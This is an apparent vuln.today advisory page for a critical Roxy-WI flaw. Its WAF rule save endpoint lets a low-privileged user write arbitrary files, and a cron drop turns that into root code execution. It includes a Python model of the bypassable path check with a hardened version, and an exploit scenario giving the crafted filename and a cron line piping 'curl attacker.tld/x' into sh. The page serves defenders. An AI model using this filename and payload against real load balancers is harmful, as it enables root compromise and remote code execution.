
Roxy-WI CVE-2026-45556 (EUVD-2026-36038)

Severity: CRITICAL 9.9 (CVSS 3.1, scored by NVD)
Weakness: Improper Input Validation (CWE-20)
Published: 2026-06-10 (source: GitHub_M)

Severity by source

NVD PRIMARY
9.9 CRITICAL
AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Primary rating from NVD · only source for this CVE.

CVSS Vector (NVD)

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Changed
Confidentiality: High
Integrity: High
Availability: High

Lifecycle Timeline

CVE Published: Jun 10, 2026 - 14:00 (NVD), rated CRITICAL 9.9
Analysis Generated: Jun 10, 2026 - 15:15 (vuln.today)

Description (NVD)

Roxy-WI is a web interface for managing HAProxy, Nginx, Apache and Keepalived servers. In versions 8.2.6.4 and prior, POST /waf/<service>/<server_ip>/rule/<rule_id>/save accepts a config_file_name form field that is passed straight through to config_mod.master_slave_upload_and_restart(...) as the destination path. The validation chain (_replace_config_path_to_correct → check_is_conf) only requires the path to contain a hard-coded service substring (nginx/haproxy/apache2/httpd/keepalived) and the substring "conf" or "cfg", and to not contain "..". The encoded-slash substitution (the sequence "92" is replaced by "/") is applied before the substring check, so the attacker can build any absolute path on the load balancer's filesystem as long as it satisfies those substring constraints. The body of the WAF rule (the config form field) is written verbatim to that path. By choosing a filename like 92etc92cron.d92nginx_cfg_evil (which resolves to /etc/cron.d/nginx_cfg_evil), an attacker drops a cron entry with attacker-controlled content on the load balancer. Cron parses the file on its next scan and executes the embedded job as root: full RCE on every load balancer the caller's group manages. At time of publication, there are no publicly available patches.
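The following is an added illustration, not Roxy-WI's source code: it models the validation chain exactly as the description above characterises it (decode "92" to "/", then require a service substring, "conf" or "cfg", and no ".."), shows why the cron.d filename passes, and places a hardened check beside it that only accepts an absolute, dot-dot-free path whose suffix is .conf or .cfg and which sits under an allowlisted configuration directory for the requested service. The function names _replace_config_path_to_correct and check_is_conf come from the advisory; their bodies, the ALLOWED_DIRS table and hardened_destination are assumptions made for the example.

```python
"""Model of the Roxy-WI config-path check described in the advisory, beside a
hardened replacement. Reconstructed for illustration; not the project's code."""
from pathlib import PurePosixPath
from typing import Optional

SERVICE_SUBSTRINGS = ("nginx", "haproxy", "apache2", "httpd", "keepalived")
CONF_SUBSTRINGS = ("conf", "cfg")


def _replace_config_path_to_correct(config_path: str) -> str:
    # Roxy-WI transports config paths with '/' encoded as '92'. Per the
    # advisory the decode happens BEFORE the substring checks below.
    return config_path.replace("92", "/")


def check_is_conf(config_path: str) -> bool:
    # Behaviour as described: any service name anywhere in the string,
    # 'conf' or 'cfg' anywhere in the string, and no '..'. Nothing anchors
    # the path to a configuration directory.
    has_service = any(s in config_path for s in SERVICE_SUBSTRINGS)
    has_conf = any(c in config_path for c in CONF_SUBSTRINGS)
    return has_service and has_conf and ".." not in config_path


def vulnerable_destination(config_file_name: str) -> Optional[str]:
    """Destination the vulnerable chain would hand to the upload routine."""
    path = _replace_config_path_to_correct(config_file_name)
    return path if check_is_conf(path) else None


# Hardened variant (assumed layout): each service may only write beneath its
# own configuration directory on the load balancer.
ALLOWED_DIRS = {
    "nginx": ("/etc/nginx",),
    "haproxy": ("/etc/haproxy",),
    "apache": ("/etc/apache2", "/etc/httpd"),
    "keepalived": ("/etc/keepalived",),
}


def hardened_destination(service: str, config_file_name: str) -> Optional[str]:
    """Return the path only if it is an absolute .conf/.cfg file strictly
    inside one of the service's allowed directories; otherwise None."""
    if service not in ALLOWED_DIRS:
        return None
    path = PurePosixPath(_replace_config_path_to_correct(config_file_name))
    if not path.is_absolute():
        return None
    # PurePosixPath collapses '.' and duplicate slashes but keeps '..';
    # reject any '..' component rather than relying on a substring check.
    if any(part in ("..", ".", "") for part in path.parts[1:]):
        return None
    if path.suffix not in (".conf", ".cfg"):
        return None
    for base in ALLOWED_DIRS[service]:
        if PurePosixPath(base) in path.parents:
            return str(path)
    return None


if __name__ == "__main__":
    evil = "92etc92cron.d92nginx_cfg_evil"  # filename from the advisory
    print("vulnerable chain accepts:", vulnerable_destination(evil))
    print("hardened chain accepts:", hardened_destination("nginx", evil))
```

The hardened check is lexical only; the file is ultimately written on a remote load balancer, so the agent performing the write on that host should additionally resolve symlinks (os.path.realpath) and re-check containment there before opening the destination.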

Analysis (AI)

Remote code execution in Roxy-WI versions 8.2.6.4 and prior allows authenticated users to write attacker-controlled content to arbitrary absolute paths on managed load balancers via the WAF rule save endpoint. By dropping a malicious cron file (e.g., /etc/cron.d/nginx_cfg_evil), an attacker achieves root-level code execution on every load balancer in the caller's group. …


Attack Chain (AI-derived)

Hypothetical attack flow derived from CVE metadata

Access: Obtain a low-privileged Roxy-WI account
Delivery: POST a crafted save request to the /waf endpoint
Exploit: Bypass the substring path validation via 92-encoded slashes
Execution: Write a malicious cron file to /etc/cron.d on a managed LB
Persist: Cron executes the payload as root
Impact: Pivot across all group-managed load balancers

Vulnerability Assessment (AI)

Exploitation: Exploitation requires a valid low-privileged Roxy-WI user account with permission to call POST /waf/<service>/<server_ip>/rule/<rule_id>/save (PR:L per CVSS), and the attacker's group must include at least one managed load balancer for the RCE to land. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment: The CVSS 9.9 score (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H) accurately reflects severe real-world risk: network-reachable, low complexity, scope-changing (the Roxy-WI web app pivots into root code execution on every downstream load balancer), with full CIA impact. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario: An attacker with any low-privileged Roxy-WI account (e.g., a contractor with WAF-edit rights, or a compromised operator credential) sends a POST to /waf/nginx/<server_ip>/rule/<rule_id>/save with config_file_name set to '92etc92cron.d92nginx_cfg_evil' and a config body containing '* * * * * root curl attacker.tld/x|sh'. Roxy-WI decodes 92 to /, checks that the path contains 'nginx' and 'cfg', and writes the file to /etc/cron.d/nginx_cfg_evil on every load balancer in the user's group; within a minute cron executes the payload as root across the entire LB fleet.
Remediation: No vendor-released patch was identified at time of analysis. The GHSA advisory (https://github.com/roxy-wi/roxy-wi/security/advisories/GHSA-85gm-773v-x7m4) states that no public patches exist at publication, so monitor that advisory for an upstream fix and upgrade as soon as a patched release is announced. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended Action (AI)

Within 24 hours: Inventory all Roxy-WI deployments and confirm version numbers; immediately revoke or rotate credentials for users with WAF rule management access. …


CVE-2026-45556 vulnerability details – vuln.today
